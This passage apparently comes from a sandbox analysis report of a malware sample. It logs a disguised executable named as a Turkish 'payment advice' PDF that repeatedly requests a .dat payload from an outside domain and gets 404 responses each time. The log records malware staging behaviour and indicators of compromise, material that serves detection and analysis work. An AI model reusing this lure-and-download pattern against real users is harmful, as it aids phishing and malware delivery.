      2024-12-16 13:26:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      73192.168.2.550050185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:48 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:48 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:48 GMT
      vary: User-Agent
      2024-12-16 13:26:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      74192.168.2.550051185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:49 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:50 GMT
      vary: User-Agent
      2024-12-16 13:26:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      75192.168.2.550052185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:51 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:52 GMT
      vary: User-Agent
      2024-12-16 13:26:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      76192.168.2.550053185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:53 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:53 GMT
      vary: User-Agent
      2024-12-16 13:26:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      77192.168.2.550054185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:55 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:55 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:55 GMT
      vary: User-Agent
      2024-12-16 13:26:55 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      78192.168.2.550055185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:57 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:57 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:57 GMT
      vary: User-Agent
      2024-12-16 13:26:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      79192.168.2.550056185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:59 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:59 GMT
      vary: User-Agent
      2024-12-16 13:26:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      80192.168.2.550057185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:01 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:01 GMT
      vary: User-Agent
      2024-12-16 13:27:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      81192.168.2.550058185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:02 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:03 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:03 GMT
      vary: User-Agent
      2024-12-16 13:27:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      82192.168.2.550059185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:04 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:05 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:05 GMT
      vary: User-Agent
      2024-12-16 13:27:05 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      83192.168.2.550060185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:06 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:07 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:06 GMT
      vary: User-Agent
      2024-12-16 13:27:07 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      84192.168.2.550061185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:08 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:09 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:08 GMT
      vary: User-Agent
      2024-12-16 13:27:09 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      85192.168.2.550062185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:10 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:10 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:10 GMT
      vary: User-Agent
      2024-12-16 13:27:10 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      86192.168.2.550063185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:12 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:12 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:12 GMT
      vary: User-Agent
